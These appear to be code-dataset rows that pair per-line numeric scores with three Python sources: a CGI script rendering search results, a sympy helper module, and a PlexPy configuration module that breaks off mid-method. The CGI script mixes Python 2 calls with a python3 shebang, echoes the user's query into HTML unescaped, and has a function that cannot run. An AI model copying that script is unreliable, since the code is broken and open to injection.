[ 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0.01098901098901099, 0, 0, 0, 0, 0, 0.027777777777777776, 0.010869565217391304, 0, 0, 0, 0, 0, 0.02631578947368421, 0.011363636363636364, 0, 0, 0.06557377049180328, 0, 0.020833333333333332, 0.05084745762711865, 0, 0.05263157894736842, 0, 0.023255813953488372, 0, 0.045454545454545456, 0, 0.02, 0.025, 0, 0.030303030303030304, 0, 0.02127659574468085, 0, 0, 0.02857142857142857, 0, 0, 0, 0.03508771929824561, 0.013888888888888888, 0, 0, 0, 0.011627906976744186, 0.02857142857142857, 0, 0, 0.01639344262295082, 0.011111111111111112, 0.02564102564102564, 0, 0, 0, 0, 0.01818181818181818, 0, 0, 0.03305785123966942, 0, 0.012987012987012988, 0, 0.01834862385321101, 0.0625, 0.018867924528301886, 0, 0, 0.011494252873563218, 0, 0.01818181818181818, 0, 0.04, 0.022727272727272728, 0.03225806451612903, 0.037037037037037035, 0.027777777777777776, 0, 0, 0, 0.041666666666666664, 0, 0, 0.041666666666666664, 0, 0.018518518518518517, 0.0625, 0.01904761904761905, 0, 0, 0, 0, 0, 1 ]
123
0.01859
false
#! /usr/local/bin/python3 import cgitb cgitb.enable() import sys import cgi import urllib import os, sys, inspect # realpath() with make your script run, even if you symlink it :) cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0])) if cmd_folder not in sys.path: sys.path.insert(0, cmd_folder) # use this if you want to include modules from a subforder cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"subfolder"))) if cmd_subfolder not in sys.path: sys.path.insert(0, cmd_subfolder) import yate import mainmodel import markup ####################SINGLE QUERY ########################################## def jsonPaserForOnePage(each_json): titles = [] contents = [] urls = [] ####### each JSON means each page result in a JSON for result in each_json['responseData']['results']: temp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8') titles.append(temp_title) temp_content = result['content'].encode('utf-8').strip("<b>...</b>").replace("<b>",'').replace("</b>",'').replace("&#39;","'").strip() contents.append(temp_content) temp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8') urls.append(temp_url) return titles, contents, urls def each_jsonPaser(each_json): all_result = [] for result in each_json['responseData']['results']: each_result = [] temp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8') each_result.append(temp_title) temp_content = result['content'].encode('utf-8').strip("<b>...</b>").replace("<b>",'').replace("</b>",'').replace("&#39;","'").strip() each_result.append(temp_content) temp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8') each_result.append(temp_url) all_result.append(each_result) return all_result def each_jsonPaserUsingDic(each_json): all_result = {} for result in each_json['responseData']['results']: temp_title = 
urllib.unquote(result['titleNoFormatting']).encode('utf-8') all_result['title'] = temp_title each_result.append(temp_title) temp_content = result['content'].encode('utf-8').strip("<b>...</b>").replace("<b>",'').replace("</b>",'').replace("&#39;","'").strip() each_result.append(temp_content) temp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8') each_result.append(temp_url) all_result.append(each_result) return all_result ########## MULTIPLE query ######################## ####### controller process #############3 form_data = cgi.FieldStorage() term = form_data['terms'].value # "results" are the JSONs list containing each page result FOR ONE QUERY [[ONE PAGE - title,content,url],[ONE PAGE - JSON]] results = mainmodel.get_googleResult_from_firstQuery(term) #for each in results: # fordiaply = each_jsonPaser(each) for each in results: onePageTitles,onePageContents,onePageUrls = jsonPaserForOnePage(each) print(yate.start_response()) print(yate.include_header("The is a search page for " + str(term))) print(yate.include_menu({"satisfied, go back Google": "/index.html"}, str(term) )) #print(yate.start_form("controller2.py")) #print(yate.input_text('terms',str(term))) #print(yate.end_form("enter to my app")) #print(yate.para("Query for:" + str(term))) #print("<br /><br />") for title, content, url in zip(onePageTitles,onePageContents,onePageUrls): print(yate.render_search_result(title,content,url)) #mypage = markup.page() #mypage.addfooter("fuck you") #print (mypage) #print("<button type="button" onclick="alert('Hello world!')">Click Me!</button>")
[ "#! /usr/local/bin/python3\n", "import cgitb\n", "cgitb.enable()\n", "import sys\n", "import cgi \n", "import urllib\n", "\n", "import os, sys, inspect\n", "# realpath() with make your script run, even if you symlink it :)\n", "cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))\n", "if cmd_folder not in sys.path:\n", "\tsys.path.insert(0, cmd_folder)\n", "# use this if you want to include modules from a subforder\n", "cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"subfolder\")))\n", "if cmd_subfolder not in sys.path:\n", "\tsys.path.insert(0, cmd_subfolder)\n", "\n", "import yate\n", "import mainmodel\n", "import markup\n", "\n", "####################SINGLE QUERY ##########################################\n", "def jsonPaserForOnePage(each_json):\n", "\ttitles = []\n", "\tcontents = []\n", "\turls = []\n", "\t####### each JSON means each page result in a JSON \n", "\tfor result in each_json['responseData']['results']:\n", "\t\ttemp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8')\n", "\t\ttitles.append(temp_title)\n", "\t\ttemp_content = result['content'].encode('utf-8').strip(\"<b>...</b>\").replace(\"<b>\",'').replace(\"</b>\",'').replace(\"&#39;\",\"'\").strip()\n", "\t\tcontents.append(temp_content)\n", "\t\ttemp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8')\n", "\t\turls.append(temp_url)\n", "\treturn titles, contents, urls\n", "\t\n", "def each_jsonPaser(each_json):\n", "\tall_result = []\n", "\tfor result in each_json['responseData']['results']:\n", "\t\teach_result = []\n", "\t\ttemp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8')\n", "\t\teach_result.append(temp_title)\n", "\t\ttemp_content = result['content'].encode('utf-8').strip(\"<b>...</b>\").replace(\"<b>\",'').replace(\"</b>\",'').replace(\"&#39;\",\"'\").strip()\n", "\t\teach_result.append(temp_content)\n", 
"\t\ttemp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8')\n", "\t\teach_result.append(temp_url)\n", "\t\tall_result.append(each_result)\n", "\treturn all_result\n", "\t\n", "def each_jsonPaserUsingDic(each_json):\n", "\tall_result = {}\n", "\tfor result in each_json['responseData']['results']:\n", "\t\ttemp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8')\n", "\t\tall_result['title'] = temp_title\n", "\t\teach_result.append(temp_title)\n", "\t\ttemp_content = result['content'].encode('utf-8').strip(\"<b>...</b>\").replace(\"<b>\",'').replace(\"</b>\",'').replace(\"&#39;\",\"'\").strip()\n", "\t\teach_result.append(temp_content)\n", "\t\ttemp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8')\n", "\t\teach_result.append(temp_url)\n", "\t\tall_result.append(each_result)\n", "\treturn all_result\n", "\t\n", "########## MULTIPLE query ########################\n", "\n", "\n", "\n", "####### controller process #############3\n", "\n", "form_data = cgi.FieldStorage()\n", "term = form_data['terms'].value\n", "\n", "# \"results\" are the JSONs list containing each page result FOR ONE QUERY [[ONE PAGE - title,content,url],[ONE PAGE - JSON]]\n", "results = mainmodel.get_googleResult_from_firstQuery(term)\n", "\n", "#for each in results:\t\n", "#\tfordiaply = each_jsonPaser(each)\n", "\n", "for each in results:\t\n", "\tonePageTitles,onePageContents,onePageUrls = jsonPaserForOnePage(each)\n", "\n", "print(yate.start_response())\n", "print(yate.include_header(\"The is a search page for \" + str(term)))\n", "print(yate.include_menu({\"satisfied, go back Google\": \"/index.html\"}, str(term) ))\n", "#print(yate.start_form(\"controller2.py\"))\n", "#print(yate.input_text('terms',str(term)))\n", "#print(yate.end_form(\"enter to my app\"))\n", "#print(yate.para(\"Query for:\" + str(term)))\n", "\n", "#print(\"<br /><br />\")\n", "for title, content, url in zip(onePageTitles,onePageContents,onePageUrls):\n", 
"\t\tprint(yate.render_search_result(title,content,url))\n", "#mypage = markup.page()\n", "#mypage.addfooter(\"fuck you\")\n", "#print (mypage)\n", "\n", "\n", "#print(\"<button type=\"button\" onclick=\"alert('Hello world!')\">Click Me!</button>\")\n", "\n" ]
[ 0, 0, 0, 0.09090909090909091, 0.16666666666666666, 0.07142857142857142, 0, 0.08333333333333333, 0, 0.027777777777777776, 0, 0.03125, 0, 0.029197080291970802, 0, 0.02857142857142857, 0, 0.08333333333333333, 0.058823529411764705, 0.07142857142857142, 0, 0.013157894736842105, 0.027777777777777776, 0.07692307692307693, 0.06666666666666667, 0.09090909090909091, 0.05660377358490566, 0.018867924528301886, 0.013333333333333334, 0.03571428571428571, 0.0364963503649635, 0.03125, 0.014705882352941176, 0.041666666666666664, 0.03225806451612903, 1, 0.03225806451612903, 0.058823529411764705, 0.018867924528301886, 0.05263157894736842, 0.013333333333333334, 0.030303030303030304, 0.0364963503649635, 0.02857142857142857, 0.014705882352941176, 0.03225806451612903, 0.030303030303030304, 0.05263157894736842, 1, 0.02564102564102564, 0.058823529411764705, 0.018867924528301886, 0.013333333333333334, 0.02857142857142857, 0.030303030303030304, 0.0364963503649635, 0.02857142857142857, 0.014705882352941176, 0.03225806451612903, 0.030303030303030304, 0.05263157894736842, 1, 0.0196078431372549, 0, 0, 0, 0.047619047619047616, 0, 0.03225806451612903, 0, 0, 0.008064516129032258, 0, 0, 0.08695652173913043, 0.02857142857142857, 0, 0.045454545454545456, 0.05555555555555555, 0, 0, 0, 0.024096385542168676, 0.023809523809523808, 0.023255813953488372, 0.024390243902439025, 0.022727272727272728, 0, 0.043478260869565216, 0.02666666666666667, 0.07407407407407407, 0.041666666666666664, 0.03333333333333333, 0.0625, 0, 0, 0.024096385542168676, 1 ]
98
0.069581
false
#!/usr/bin/python3 # Globals.py # # Copyright (C) 2015 Caian Benedicto <caianbene@gmail.com> # # This file is part of Asparagus # # Asparagus is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # Asparagus is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # import sympy from sympy.parsing.sympy_parser import parse_expr def time(symbols): return symbols.getSymbol('$global', 'time', nonnegative=True) time_alias = 't' def gravity(symbols): return ( symbols.getSymbol('$global', 'gravity.value', nonnegative=True), symbols.getSymbol('$global', 'gravity.theta') ) gravity_alias = 'g' def isTimeConstant(s, symbols): s = sympy.simplify(s) if s == time(symbols): return False args = s.args for arg in args: if not isTimeConstant(arg, symbols): return False return True def convertAttachment(att, mode = 't'): m = att[2] if mode == m: return (att[0], att[1], att[2]) elif mode == 'r': if m == 'p': d = att[0] t = att[1] return (d*sympy.sin(t), d*sympy.cos(t), mode) else: raise Exception('invalid attachment mode %s' % str(m)) elif mode == 'p': if m == 'r': x = att[0] y = att[1] # TODO remember to flip y during c->r # check theta direction return (sympy.sqrt(x**2+y**2), sympy.atan2(x, y), mode) else: raise Exception('invalid attachment mode %s' % str(m)) else: raise Exception('invalid attachment mode %s' % str(mode)) def positify(expr, symbag): if expr.is_Symbol: symbag[expr] = sympy.Symbol(expr.name, positive=True) else: for arg in expr.args: positify(arg, symbag) def parseExpr(expr): if expr[0] == '"' and expr[-1] == '"': expr = expr[1:-1] symbag = {} expr = parse_expr(expr) positify(expr, symbag) expr = expr.subs(symbag) return expr def 
no_alias(t): return t def getObjName(name): return name def getAttachProp(objname, prop): return 'attach.%s.%s' % (objname, prop) def getPropString(objname, prop): return '%s.%s' % (objname, prop) def norm2d(a): return sympy.simplify(sympy.sqrt(a[0]**2+a[1]**2)) def cross2d(a, b): return sympy.simplify(a[0]*b[1]-b[0]*a[1]) def dot2d(a, b): return sympy.simplify(a[0]*b[0]+a[1]*b[1]) def ssign(a): return sympy.simplify(sympy.sign(a))
[ "#!/usr/bin/python3\n", "\n", "# Globals.py\n", "#\n", "# Copyright (C) 2015 Caian Benedicto <caianbene@gmail.com>\n", "#\n", "# This file is part of Asparagus\n", "#\n", "# Asparagus is free software; you can redistribute it and/or modify it \n", "# under the terms of the GNU General Public License as published by \n", "# the Free Software Foundation; either version 2, or (at your option)\n", "# any later version.\n", "#\n", "# Asparagus is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "\n", "import sympy\n", "from sympy.parsing.sympy_parser import parse_expr\n", "\n", "def time(symbols): \n", " return symbols.getSymbol('$global', 'time', nonnegative=True)\n", "\n", "time_alias = 't'\n", "\n", "def gravity(symbols): \n", " return (\n", " symbols.getSymbol('$global', 'gravity.value', nonnegative=True),\n", " symbols.getSymbol('$global', 'gravity.theta')\n", " )\n", "\n", "gravity_alias = 'g'\n", "\n", "def isTimeConstant(s, symbols):\n", " s = sympy.simplify(s)\n", " if s == time(symbols):\n", " return False\n", " args = s.args\n", " for arg in args:\n", " if not isTimeConstant(arg, symbols):\n", " return False\n", " return True\n", "\n", "def convertAttachment(att, mode = 't'):\n", " m = att[2]\n", " if mode == m:\n", " return (att[0], att[1], att[2])\n", " elif mode == 'r':\n", " if m == 'p':\n", " d = att[0]\n", " t = att[1]\n", " return (d*sympy.sin(t), d*sympy.cos(t), mode)\n", " else:\n", " raise Exception('invalid attachment mode %s' % str(m))\n", " elif mode == 'p':\n", " if m == 'r':\n", " x = att[0]\n", " y = att[1]\n", " # TODO remember to flip y during c->r\n", " # check theta direction\n", " return (sympy.sqrt(x**2+y**2), sympy.atan2(x, y), mode)\n", " else:\n", " raise Exception('invalid attachment mode %s' % str(m))\n", " else:\n", " raise 
Exception('invalid attachment mode %s' % str(mode))\n", "\n", "def positify(expr, symbag):\n", " if expr.is_Symbol:\n", " symbag[expr] = sympy.Symbol(expr.name, positive=True)\n", " else:\n", " for arg in expr.args:\n", " positify(arg, symbag)\n", "\n", "def parseExpr(expr):\n", " if expr[0] == '\"' and expr[-1] == '\"':\n", " expr = expr[1:-1]\n", " symbag = {}\n", " expr = parse_expr(expr)\n", " positify(expr, symbag)\n", " expr = expr.subs(symbag)\n", " return expr\n", "\n", "def no_alias(t):\n", " return t\n", "\n", "def getObjName(name):\n", " return name\n", "\n", "def getAttachProp(objname, prop):\n", " return 'attach.%s.%s' % (objname, prop)\n", "\n", "def getPropString(objname, prop):\n", " return '%s.%s' % (objname, prop)\n", "\n", "def norm2d(a):\n", " return sympy.simplify(sympy.sqrt(a[0]**2+a[1]**2))\n", "\n", "def cross2d(a, b):\n", " return sympy.simplify(a[0]*b[1]-b[0]*a[1])\n", "\n", "def dot2d(a, b):\n", " return sympy.simplify(a[0]*b[0]+a[1]*b[1])\n", "\n", "def ssign(a):\n", " return sympy.simplify(sympy.sign(a))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0.0136986301369863, 0.014285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0.058823529411764705, 0, 0.08695652173913043, 0, 0, 0, 0, 0, 0.05, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.075, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0.045454545454545456, 0, 0, 0.029411764705882353, 0, 0, 0.029411764705882353, 0, 0, 0.06666666666666667, 0, 0, 0.05263157894736842, 0, 0, 0.058823529411764705, 0, 0, 0.07142857142857142, 0 ]
107
0.008654
false
import plexpy.logger import itertools import os import re from configobj import ConfigObj def bool_int(value): """ Casts a config value into a 0 or 1 """ if isinstance(value, basestring): if value.lower() in ('', '0', 'false', 'f', 'no', 'n', 'off'): value = 0 return int(bool(value)) _CONFIG_DEFINITIONS = { 'DATE_FORMAT': (str, 'General', 'YYYY-MM-DD'), 'GROUPING_GLOBAL_HISTORY': (int, 'PlexWatch', 0), 'GROUPING_USER_HISTORY': (int, 'PlexWatch', 0), 'GROUPING_CHARTS': (int, 'PlexWatch', 0), 'PLEXWATCH_DATABASE': (str, 'PlexWatch', ''), 'PMS_IDENTIFIER': (str, 'PMS', ''), 'PMS_IP': (str, 'PMS', '127.0.0.1'), 'PMS_IS_REMOTE': (int, 'PMS', 0), 'PMS_LOGS_FOLDER': (str, 'PMS', ''), 'PMS_PORT': (int, 'PMS', 32400), 'PMS_TOKEN': (str, 'PMS', ''), 'PMS_SSL': (int, 'General', 0), 'PMS_URL': (str, 'PMS', ''), 'PMS_USE_BIF': (int, 'PMS', 0), 'PMS_UUID': (str, 'PMS', ''), 'TIME_FORMAT': (str, 'General', 'HH:mm'), 'API_ENABLED': (int, 'General', 0), 'API_KEY': (str, 'General', ''), 'BOXCAR_ENABLED': (int, 'Boxcar', 0), 'BOXCAR_TOKEN': (str, 'Boxcar', ''), 'BOXCAR_ON_PLAY': (int, 'Boxcar', 0), 'BOXCAR_ON_STOP': (int, 'Boxcar', 0), 'BOXCAR_ON_PAUSE': (int, 'Boxcar', 0), 'BOXCAR_ON_RESUME': (int, 'Boxcar', 0), 'BOXCAR_ON_BUFFER': (int, 'Boxcar', 0), 'BOXCAR_ON_WATCHED': (int, 'Boxcar', 0), 'BUFFER_THRESHOLD': (int, 'Monitoring', 3), 'BUFFER_WAIT': (int, 'Monitoring', 900), 'CACHE_DIR': (str, 'General', ''), 'CACHE_SIZEMB': (int, 'Advanced', 32), 'CHECK_GITHUB': (int, 'General', 1), 'CHECK_GITHUB_INTERVAL': (int, 'General', 360), 'CHECK_GITHUB_ON_STARTUP': (int, 'General', 1), 'CLEANUP_FILES': (int, 'General', 0), 'CONFIG_VERSION': (str, 'General', '0'), 'DO_NOT_OVERRIDE_GIT_BRANCH': (int, 'General', 0), 'EMAIL_ENABLED': (int, 'Email', 0), 'EMAIL_FROM': (str, 'Email', ''), 'EMAIL_TO': (str, 'Email', ''), 'EMAIL_SMTP_SERVER': (str, 'Email', ''), 'EMAIL_SMTP_USER': (str, 'Email', ''), 'EMAIL_SMTP_PASSWORD': (str, 'Email', ''), 'EMAIL_SMTP_PORT': (int, 'Email', 25), 'EMAIL_TLS': (int, 
'Email', 0), 'EMAIL_ON_PLAY': (int, 'Email', 0), 'EMAIL_ON_STOP': (int, 'Email', 0), 'EMAIL_ON_PAUSE': (int, 'Email', 0), 'EMAIL_ON_RESUME': (int, 'Email', 0), 'EMAIL_ON_BUFFER': (int, 'Email', 0), 'EMAIL_ON_WATCHED': (int, 'Email', 0), 'ENABLE_HTTPS': (int, 'General', 0), 'FIRST_RUN_COMPLETE': (int, 'General', 0), 'FREEZE_DB': (int, 'General', 0), 'GIT_BRANCH': (str, 'General', 'master'), 'GIT_PATH': (str, 'General', ''), 'GIT_USER': (str, 'General', 'drzoidberg33'), 'GROWL_ENABLED': (int, 'Growl', 0), 'GROWL_HOST': (str, 'Growl', ''), 'GROWL_PASSWORD': (str, 'Growl', ''), 'GROWL_ON_PLAY': (int, 'Growl', 0), 'GROWL_ON_STOP': (int, 'Growl', 0), 'GROWL_ON_PAUSE': (int, 'Growl', 0), 'GROWL_ON_RESUME': (int, 'Growl', 0), 'GROWL_ON_BUFFER': (int, 'Growl', 0), 'GROWL_ON_WATCHED': (int, 'Growl', 0), 'HOME_LIBRARY_CARDS': (str, 'General', 'library_statistics_first'), 'HOME_STATS_LENGTH': (int, 'General', 30), 'HOME_STATS_TYPE': (int, 'General', 0), 'HOME_STATS_COUNT': (int, 'General', 5), 'HOME_STATS_CARDS': (str, 'General', 'watch_statistics, top_tv, popular_tv, top_movies, popular_movies, top_music, popular_music, top_users, top_platforms, last_watched'), 'HTTPS_CERT': (str, 'General', ''), 'HTTPS_KEY': (str, 'General', ''), 'HTTP_HOST': (str, 'General', '0.0.0.0'), 'HTTP_PASSWORD': (str, 'General', ''), 'HTTP_PORT': (int, 'General', 8181), 'HTTP_PROXY': (int, 'General', 0), 'HTTP_ROOT': (str, 'General', '/'), 'HTTP_USERNAME': (str, 'General', ''), 'INTERFACE': (str, 'General', 'default'), 'IP_LOGGING_ENABLE': (int, 'General', 0), 'JOURNAL_MODE': (str, 'Advanced', 'wal'), 'LAUNCH_BROWSER': (int, 'General', 1), 'LOG_DIR': (str, 'General', ''), 'LOGGING_IGNORE_INTERVAL': (int, 'Monitoring', 120), 'MOVIE_NOTIFY_ENABLE': (int, 'Monitoring', 0), 'MOVIE_NOTIFY_ON_START': (int, 'Monitoring', 1), 'MOVIE_NOTIFY_ON_STOP': (int, 'Monitoring', 0), 'MOVIE_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0), 'MUSIC_NOTIFY_ENABLE': (int, 'Monitoring', 0), 'MUSIC_NOTIFY_ON_START': (int, 
'Monitoring', 1), 'MUSIC_NOTIFY_ON_STOP': (int, 'Monitoring', 0), 'MUSIC_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0), 'MUSIC_LOGGING_ENABLE': (int, 'Monitoring', 0), 'MONITORING_INTERVAL': (int, 'Monitoring', 60), 'NMA_APIKEY': (str, 'NMA', ''), 'NMA_ENABLED': (int, 'NMA', 0), 'NMA_PRIORITY': (int, 'NMA', 0), 'NMA_ON_PLAY': (int, 'NMA', 0), 'NMA_ON_STOP': (int, 'NMA', 0), 'NMA_ON_PAUSE': (int, 'NMA', 0), 'NMA_ON_RESUME': (int, 'NMA', 0), 'NMA_ON_BUFFER': (int, 'NMA', 0), 'NMA_ON_WATCHED': (int, 'NMA', 0), 'NOTIFY_WATCHED_PERCENT': (int, 'Monitoring', 85), 'NOTIFY_ON_START_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_START_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) started playing {title}.'), 'NOTIFY_ON_STOP_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_STOP_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has stopped {title}.'), 'NOTIFY_ON_PAUSE_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_PAUSE_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has paused {title}.'), 'NOTIFY_ON_RESUME_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_RESUME_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has resumed {title}.'), 'NOTIFY_ON_BUFFER_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_BUFFER_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) is buffering {title}.'), 'NOTIFY_ON_WATCHED_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_WATCHED_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has watched {title}.'), 'OSX_NOTIFY_APP': (str, 'OSX_Notify', '/Applications/PlexPy'), 'OSX_NOTIFY_ENABLED': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_PLAY': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_STOP': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_PAUSE': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_RESUME': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_BUFFER': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_WATCHED': (int, 'OSX_Notify', 0), 
'PLEX_CLIENT_HOST': (str, 'Plex', ''), 'PLEX_ENABLED': (int, 'Plex', 0), 'PLEX_PASSWORD': (str, 'Plex', ''), 'PLEX_USERNAME': (str, 'Plex', ''), 'PLEX_ON_PLAY': (int, 'Plex', 0), 'PLEX_ON_STOP': (int, 'Plex', 0), 'PLEX_ON_PAUSE': (int, 'Plex', 0), 'PLEX_ON_RESUME': (int, 'Plex', 0), 'PLEX_ON_BUFFER': (int, 'Plex', 0), 'PLEX_ON_WATCHED': (int, 'Plex', 0), 'PROWL_ENABLED': (int, 'Prowl', 0), 'PROWL_KEYS': (str, 'Prowl', ''), 'PROWL_PRIORITY': (int, 'Prowl', 0), 'PROWL_ON_PLAY': (int, 'Prowl', 0), 'PROWL_ON_STOP': (int, 'Prowl', 0), 'PROWL_ON_PAUSE': (int, 'Prowl', 0), 'PROWL_ON_RESUME': (int, 'Prowl', 0), 'PROWL_ON_BUFFER': (int, 'Prowl', 0), 'PROWL_ON_WATCHED': (int, 'Prowl', 0), 'PUSHALOT_APIKEY': (str, 'Pushalot', ''), 'PUSHALOT_ENABLED': (int, 'Pushalot', 0), 'PUSHALOT_ON_PLAY': (int, 'Pushalot', 0), 'PUSHALOT_ON_STOP': (int, 'Pushalot', 0), 'PUSHALOT_ON_PAUSE': (int, 'Pushalot', 0), 'PUSHALOT_ON_RESUME': (int, 'Pushalot', 0), 'PUSHALOT_ON_BUFFER': (int, 'Pushalot', 0), 'PUSHALOT_ON_WATCHED': (int, 'Pushalot', 0), 'PUSHBULLET_APIKEY': (str, 'PushBullet', ''), 'PUSHBULLET_DEVICEID': (str, 'PushBullet', ''), 'PUSHBULLET_CHANNEL_TAG': (str, 'PushBullet', ''), 'PUSHBULLET_ENABLED': (int, 'PushBullet', 0), 'PUSHBULLET_ON_PLAY': (int, 'PushBullet', 0), 'PUSHBULLET_ON_STOP': (int, 'PushBullet', 0), 'PUSHBULLET_ON_PAUSE': (int, 'PushBullet', 0), 'PUSHBULLET_ON_RESUME': (int, 'PushBullet', 0), 'PUSHBULLET_ON_BUFFER': (int, 'PushBullet', 0), 'PUSHBULLET_ON_WATCHED': (int, 'PushBullet', 0), 'PUSHOVER_APITOKEN': (str, 'Pushover', ''), 'PUSHOVER_ENABLED': (int, 'Pushover', 0), 'PUSHOVER_KEYS': (str, 'Pushover', ''), 'PUSHOVER_PRIORITY': (int, 'Pushover', 0), 'PUSHOVER_ON_PLAY': (int, 'Pushover', 0), 'PUSHOVER_ON_STOP': (int, 'Pushover', 0), 'PUSHOVER_ON_PAUSE': (int, 'Pushover', 0), 'PUSHOVER_ON_RESUME': (int, 'Pushover', 0), 'PUSHOVER_ON_BUFFER': (int, 'Pushover', 0), 'PUSHOVER_ON_WATCHED': (int, 'Pushover', 0), 'REFRESH_USERS_INTERVAL': (int, 'Monitoring', 12), 
'REFRESH_USERS_ON_STARTUP': (int, 'Monitoring', 1), 'TV_NOTIFY_ENABLE': (int, 'Monitoring', 0), 'TV_NOTIFY_ON_START': (int, 'Monitoring', 1), 'TV_NOTIFY_ON_STOP': (int, 'Monitoring', 0), 'TV_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0), 'TWITTER_ENABLED': (int, 'Twitter', 0), 'TWITTER_PASSWORD': (str, 'Twitter', ''), 'TWITTER_PREFIX': (str, 'Twitter', 'PlexPy'), 'TWITTER_USERNAME': (str, 'Twitter', ''), 'TWITTER_ON_PLAY': (int, 'Twitter', 0), 'TWITTER_ON_STOP': (int, 'Twitter', 0), 'TWITTER_ON_PAUSE': (int, 'Twitter', 0), 'TWITTER_ON_RESUME': (int, 'Twitter', 0), 'TWITTER_ON_BUFFER': (int, 'Twitter', 0), 'TWITTER_ON_WATCHED': (int, 'Twitter', 0), 'UPDATE_DB_INTERVAL': (int, 'General', 24), 'VERIFY_SSL_CERT': (bool_int, 'Advanced', 1), 'VIDEO_LOGGING_ENABLE': (int, 'Monitoring', 1), 'XBMC_ENABLED': (int, 'XBMC', 0), 'XBMC_HOST': (str, 'XBMC', ''), 'XBMC_PASSWORD': (str, 'XBMC', ''), 'XBMC_USERNAME': (str, 'XBMC', ''), 'XBMC_ON_PLAY': (int, 'XBMC', 0), 'XBMC_ON_STOP': (int, 'XBMC', 0), 'XBMC_ON_PAUSE': (int, 'XBMC', 0), 'XBMC_ON_RESUME': (int, 'XBMC', 0), 'XBMC_ON_BUFFER': (int, 'XBMC', 0), 'XBMC_ON_WATCHED': (int, 'XBMC', 0) } # pylint:disable=R0902 # it might be nice to refactor for fewer instance variables class Config(object): """ Wraps access to particular values in a config file """ def __init__(self, config_file): """ Initialize the config with values from a file """ self._config_file = config_file self._config = ConfigObj(self._config_file, encoding='utf-8') for key in _CONFIG_DEFINITIONS.keys(): self.check_setting(key) def _define(self, name): key = name.upper() ini_key = name.lower() definition = _CONFIG_DEFINITIONS[key] if len(definition) == 3: definition_type, section, default = definition else: definition_type, section, _, default = definition return key, definition_type, section, ini_key, default def check_section(self, section): """ Check if INI section exists, if not create it """ if section not in self._config: self._config[section] = {} return True 
else: return False def check_setting(self, key): """ Cast any value in the config to the right type or use the default """ key, definition_type, section, ini_key, default = self._define(key) self.check_section(section) try: my_val = definition_type(self._config[section][ini_key]) except Exception: my_val = definition_type(default) self._config[section][ini_key] = my_val return my_val def write(self): """ Make a copy of the stored config and write it to the configured file """ new_config = ConfigObj(encoding="UTF-8") new_config.filename = self._config_file # first copy over everything from the old config, even if it is not # correctly defined to keep from losing data for key, subkeys in self._config.items(): if key not in new_config: new_config[key] = {} for subkey, value in subkeys.items(): new_config[key][subkey] = value # next make sure that everything we expect to have defined is so for key in _CONFIG_DEFINITIONS.keys(): key, definition_type, section, ini_key, default = self._define(key) self.check_setting(key) if section not in new_config: new_config[section] = {} new_config[section][ini_key] = self._config[section][ini_key] # Write it to file plexpy.logger.info("Writing configuration to file") try: new_config.write() except IOError as e: plexpy.logger.error("Error writing configuration file: %s", e) def __getattr__(self, name): """ Returns something from the ini unless it is a real property of the configuration object or is not all caps. """ if not re.match(r'[A-Z_]+$', name): return 